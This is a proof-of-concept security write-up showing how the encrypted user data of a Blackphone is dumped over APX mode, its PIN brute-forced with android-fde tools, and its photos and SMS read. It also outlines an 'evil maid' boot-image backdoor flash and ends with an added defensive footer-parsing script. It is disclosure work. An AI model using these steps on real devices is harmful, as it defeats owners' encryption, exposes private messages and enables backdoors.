===================================================
 Crack the user data on Blackphone: Proof of Concept
===================================================

by Sébastien Dudek

Targeted versions :
- Android 4.4.2
- Kernel version 3.4.62-g00009e6
- build = KOT49H PrivatOS 1.0.5e

Dependencies :
- Python >= 2.6 but < 3
- Python M2Crypto

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ mkdir WAKdump
$ cd WAKdump
WAKdump$ git clone https://github.com/sogeti-esec-lab/android-fde.git
WAKdump$ cd android-fde/dump_nvtegra/Linux
WAKdump/android-fde/dump_nvtegra/Linux$ ls
dumpEncryptedPart.sh  dumpos.sh  nvflash
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To dump the encrypted "userdata.img" together with "userdata_footer.img" we need
to switch the device to APX mode (no unlock mechanism is present; these steps
are similar to ODIN mode on Samsung Galaxy devices). First, switch the phone
off, then turn it on by pressing the POWER button and wait until the phone
vibrates; still holding the POWER button, press the VOLUME-UP and VOLUME-DOWN
buttons at the same time. Then use the volume down and volume up buttons to
select the NVPFlash recovery mode option, and the device is in APX mode.

When it's done we can start the dump with the "./dumpEncryptedPart.sh" script:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde/dump_nvtegra/Linux$ ./dumpEncryptedPart.sh
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This script only dumps the partitions needed to perform our brute-force, as
follows:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde/dump_nvtegra/Linux$ ls ROM
userdata_footer.img  userdata.img
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

As we can see, the userdata.img partition looks encrypted:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde/dump_nvtegra/Linux$ cd ROM
WAKdump/android-fde/dump_nvtegra/Linux/ROM$ hexdump -C userdata.img | head -n 2
00000000  64 8a ed 1b f3 d8 64 b3  a3 45 41 ea 3b 0d 79 8f  |d.....d..EA.;.y.|
00000010  a7 fd 41 4d d4 57 a0 d8  99 63 2d 6c b7 93 69 ea  |..AM.W...c-l..i.|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


To retrieve it, we will crack this partition with the "android-fde" tools
(Github link: https://github.com/sogeti-esec-lab/android-fde):

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde/dump_nvtegra/Linux$ cd ../../
WAKdump/android-fde$ cd pydroidfde
WAKdump/android-fde$ python2 bruteforce.py
usage: bruteforce.py [-h] [-d MAXPIN_DIGITS] [-o OUTPUT_KEYFILE]
                     encrypted_partition header_file
bruteforce.py: error: too few arguments
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To begin the brute-force, we only need to provide the output keyfile, the
encrypted_partition and the header_file as follows:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde$ python2 bruteforce.py -o keyblackphone ../android-fde/dump_nvtegra/Linux/ROM/userdata.img ../android-fde/dump_nvtegra/Linux/ROM/userdata_footer.img
Magic          : 0xD0B5B1C4
Major Version  : 1
Minor Version  : 2
Footer Size    : 104 bytes
Flags          : 0x00000000
Key Size       : 128 bits
Failed Decrypts: 0
Crypto Type    : aes-cbc-essiv:sha256
Encrypted Key  : 0x7BEE47CD52489BCCE4CB148D32A0877A
Salt           : 0x0E92933EB21BE7D192D2518A4C9DC2A4
----------------
Trying to Bruteforce Password... please wait
Trying passwords from 0 to 100
[+] This partition uses scrypt
[+] scrypt parameters are: N=0xf, r=0x3, p=0x1
Password       : 0000
Derived Key    : 0x2FA82E9792A4C3ABE9352FBB4B9C31FD
Derived IV     : 0x3F74FAD55977762803B03AC22CF6D47D
Decrypted Key  : 0x5B49A4C3FA3971F5DA7A40BC3A6C11BE
[...]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wait until it finds the right PIN/password. When the bruteforce finds the
PIN/passphrase, here is what happens:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[...]
Trying to Bruteforce Password... please wait
[+] This partition uses scrypt
[+] scrypt parameters are: N=0xf, r=0x3, p=0x1
Password       : 20152015
Derived Key    : 0x511C4E2CD295F772C099A4332C653973
Derived IV     : 0x834A6DC030E58C06F7568FD6B4DE141B
Decrypted Key  : 0x81F626D9EBDF5640B6C0CF63C58B28BE
----------------
Decrypted data:
00000000: A7 FD 41 4D D6 57 A0 D8 99 63 2D 6C 77 BB 01 D8  ..AM.W...c-lw...
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
Found PIN!: 20152015
Saving decrypted master key to 'keyblackphone'
Done.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The PIN configured by 01net to encrypt the data is "20152015". Now we need to
decrypt the partition using the same "android-fde" tools:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde$ python2 decrypt.py
usage: decrypt.py [-h] [-p PASSWORD] [-s SECTOR]
                  encrypted_partition header_file outfile
decrypt.py: error: too few arguments
WAKdump/android-fde$ python2 decrypt.py -p 20152015 ../android-fde/dump_nvtegra/Linux/ROM/userdata.img ../android-fde/dump_nvtegra/Linux/ROM/userdata_footer.img decrypted_userdata.img
Magic          : 0xD0B5B1C4
Major Version  : 1
Minor Version  : 2
Footer Size    : 104 bytes
Flags          : 0x00000000
Key Size       : 128 bits
Failed Decrypts: 0
Crypto Type    : aes-cbc-essiv:sha256
Encrypted Key  : 0x7BEE47CD52489BCCE4CB148D32A0877A
Salt           : 0x0E92933EB21BE7D192D2518A4C9DC2A4
----------------
[+] This partition uses scrypt
[+] scrypt parameters are: N=0xf, r=0x3, p=0x1
Password       : 20152015
Derived Key    : 0x511C4E2CD295F772C099A4332C653973
Derived IV     : 0x834A6DC030E58C06F7568FD6B4DE141B
Decrypted Key  : 0x81F626D9EBDF5640B6C0CF63C58B28BE
----------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Then wait until it decrypts the whole "userdata.img" partition. Once the script
has decrypted the data, we can mount the "decrypted_userdata.img" file, for
example with the Linux "mount" command:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde$ sudo mount decrypted_userdata.img /mnt
WAKdump/android-fde$ cd /mnt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Then we are able to see the stored pictures that were encrypted with the user
data at the beginning:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
mnt$ find . -name "IMG*"
./media/0/DCIM/Camera/IMG_20150126_184947.jpg
./media/0/DCIM/Camera/IMG_20150126_184951.jpg
./media/0/DCIM/Camera/IMG_20150126_184954.jpg
./media/0/DCIM/Camera/IMG_20150126_185007.jpg
./media/0/DCIM/Camera/IMG_20150126_185010.jpg
./media/0/DCIM/Camera/IMG_20150126_185014.jpg
./media/0/DCIM/Camera/IMG_20150126_185019.jpg
./media/0/DCIM/Camera/IMG_20150126_185028.jpg
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

But we can also retrieve the user's SMS:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
sqlite3 ./data/com.android.providers.telephony/databases/mmssms.db
SQLite version 3.8.8.2 2015-01-30 14:30:45
Enter ".help" for usage hints.
sqlite> select * from SMS;
1|1|06 80 30 73 79||1422294679062|0||1|-1|2|||Salut ! Je t'écris depuis mon super téléphone sécurisé||0|0|1
2|1|+33680307379||1422296172000|1422296172000|0|0|-1|1|0||Hello ! Je suis un sms factice viens me pirater ;)|+33660003000|0|0|0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

And so on.

Evil Maid attack
================

To perform the evil maid attack, we have to download a homemade "boot.img" to
the device as follows:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde/dump_nvtegra/Linux$ sudo nvflash -r --download 18 evilboot.img
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This way we could install a backdoor that waits for the partition to be
decrypted and injects itself into other processes to extract data, for example.

Conclusion
==========

No unlock procedure was needed to read from or write to the flash. So once an
attacker retrieves a phone, he can backdoor it or try to retrieve targeted data
using the brute-force described in this mail. It's a matter of time, and the
complexity will vary depending on the password complexity. On the other hand,
backdooring the "boot.img" is a very efficient way, as this partition can be
downloaded to the device quickly (a few seconds).
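As an added illustration (not part of the original mail nor of the android-fde project), the following Python 3 script decodes the crypt footer fields that bruteforce.py and decrypt.py print above (magic, version, footer size, flags, key size, crypto type, the scrypt factors N=0xf, r=0x3, p=0x1) and reports, from a reviewer's point of view, how well the master key is protected. It assumes the footer follows the "struct crypt_mnt_ftr" layout of AOSP's system/vold/cryptfs.h for footer version 1.2 (the version shown on the page), and that a footer dump begins with that struct, as the header_file argument of bruteforce.py implies. The sample footer it builds for itself uses constructed placeholder key and salt bytes, not the device's values.

```python
import struct

# Layout of "struct crypt_mnt_ftr" from AOSP system/vold/cryptfs.h for footer
# version 1.2, packed little-endian without padding.  Assumption: the footer
# dumped on the page follows this layout (the page only shows decoded fields).
FOOTER_FMT = "<IHHIIIIQI64sI48s16sQQIBBBB"
FOOTER_LEN = struct.calcsize(FOOTER_FMT)               # 192 bytes
MASTER_KEY_OFFSET = struct.calcsize("<IHHIIIIQI64sI")  # 104 = "Footer Size : 104 bytes"

CRYPT_MNT_MAGIC = 0xD0B5B1C4
MAX_KEY_LEN = 48        # length of the master_key[] field; keysize says how much is used
KDF_PBKDF2, KDF_SCRYPT = 1, 2
KDF_NAMES = {KDF_PBKDF2: "pbkdf2", KDF_SCRYPT: "scrypt"}
FLAG_NAMES = {0x1: "KEY_UNENCRYPTED", 0x2: "ENCRYPTION_IN_PROGRESS",
              0x4: "INCONSISTENT_STATE", 0x8: "DATA_CORRUPT"}


def parse_footer(blob):
    """Decode a raw crypt footer into a dict; raises ValueError on a bad header."""
    if len(blob) < FOOTER_LEN:
        raise ValueError("footer too short: %d bytes" % len(blob))
    (magic, major, minor, ftr_size, flags, keysize, _spare1, fs_size, failed,
     crypto_name, _spare2, master_key, salt, _pd_off0, _pd_off1, _pd_size,
     kdf_type, n_factor, r_factor, p_factor) = struct.unpack(FOOTER_FMT, blob[:FOOTER_LEN])
    if magic != CRYPT_MNT_MAGIC:
        raise ValueError("bad magic 0x%08X" % magic)
    if not 0 < keysize <= MAX_KEY_LEN:
        raise ValueError("implausible keysize %d" % keysize)
    if minor < 2:
        # Footers older than 1.2 carry no KDF fields: vold derived their key with PBKDF2
        kdf, scrypt = "pbkdf2", None
    else:
        kdf = KDF_NAMES.get(kdf_type, "unknown(%d)" % kdf_type)
        # The footer stores log2 of each scrypt parameter: N=0xf means N = 2**15
        scrypt = {"N": 1 << n_factor, "r": 1 << r_factor, "p": 1 << p_factor}
    return {
        "version": (major, minor),
        "ftr_size": ftr_size,
        "flags": [name for bit, name in sorted(FLAG_NAMES.items()) if flags & bit],
        "keysize_bits": keysize * 8,
        "fs_size_sectors": fs_size,
        "failed_decrypts": failed,
        "crypto_type": crypto_name.split(b"\0", 1)[0].decode("ascii"),
        "encrypted_key": master_key[:keysize],
        "salt": salt,
        "kdf": kdf,
        "scrypt": scrypt,
    }


def scrypt_memory_bytes(params):
    """Memory one scrypt evaluation needs: 128 * N * r bytes (the ROMix buffer)."""
    return 128 * params["N"] * params["r"]


def review_footer(info):
    """Return defender-facing findings about the key protection the footer describes."""
    findings = []
    if info["ftr_size"] != MASTER_KEY_OFFSET:
        findings.append("ftr_size %d does not match the master_key offset %d"
                        % (info["ftr_size"], MASTER_KEY_OFFSET))
    if "KEY_UNENCRYPTED" in info["flags"]:
        findings.append("master key is flagged as stored unencrypted")
    if info["kdf"] == "pbkdf2":
        findings.append("legacy PBKDF2 key derivation: cheap to brute-force")
    elif info["scrypt"]:
        mib = scrypt_memory_bytes(info["scrypt"]) / float(1 << 20)
        findings.append("scrypt N=%d r=%d p=%d (%.0f MiB per guess): a numeric PIN is "
                        "still a tiny search space regardless of this cost"
                        % (info["scrypt"]["N"], info["scrypt"]["r"], info["scrypt"]["p"], mib))
    if info["failed_decrypts"]:
        findings.append("%d failed decrypt attempts recorded" % info["failed_decrypts"])
    return findings


def build_sample_footer():
    """Constructed test footer mirroring the decoded values printed on the page
    (v1.2, 104-byte header, 128-bit key, aes-cbc-essiv:sha256, scrypt 0xf/0x3/0x1).
    Key and salt bytes are placeholders, not the device's values."""
    placeholder_key = bytes(range(16))            # constructed, 16 bytes = 128 bits
    placeholder_salt = bytes(range(0xA0, 0xB0))   # constructed
    return struct.pack(FOOTER_FMT, CRYPT_MNT_MAGIC, 1, 2, MASTER_KEY_OFFSET, 0, 16, 0,
                       0, 0, b"aes-cbc-essiv:sha256", 0, placeholder_key,
                       placeholder_salt, 0, 0, 0, KDF_SCRYPT, 0xF, 0x3, 0x1)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_footer()
    info = parse_footer(blob)
    for key, value in info.items():
        print("%-16s %s" % (key, value.hex() if isinstance(value, bytes) else value))
    for finding in review_footer(info):
        print("[!]", finding)
```

Run it without arguments to decode the constructed sample, or with the path of a dumped footer (for example the ROM/userdata_footer.img produced above) to decode that file's first 192 bytes. The review step does not attempt any decryption; it only reads the parameters, which is enough to see the point of the conclusion: scrypt with N=2^15 and r=8 costs about 32 MiB per guess, but the strength of the wrap is bounded by the PIN's search space, not by the KDF cost.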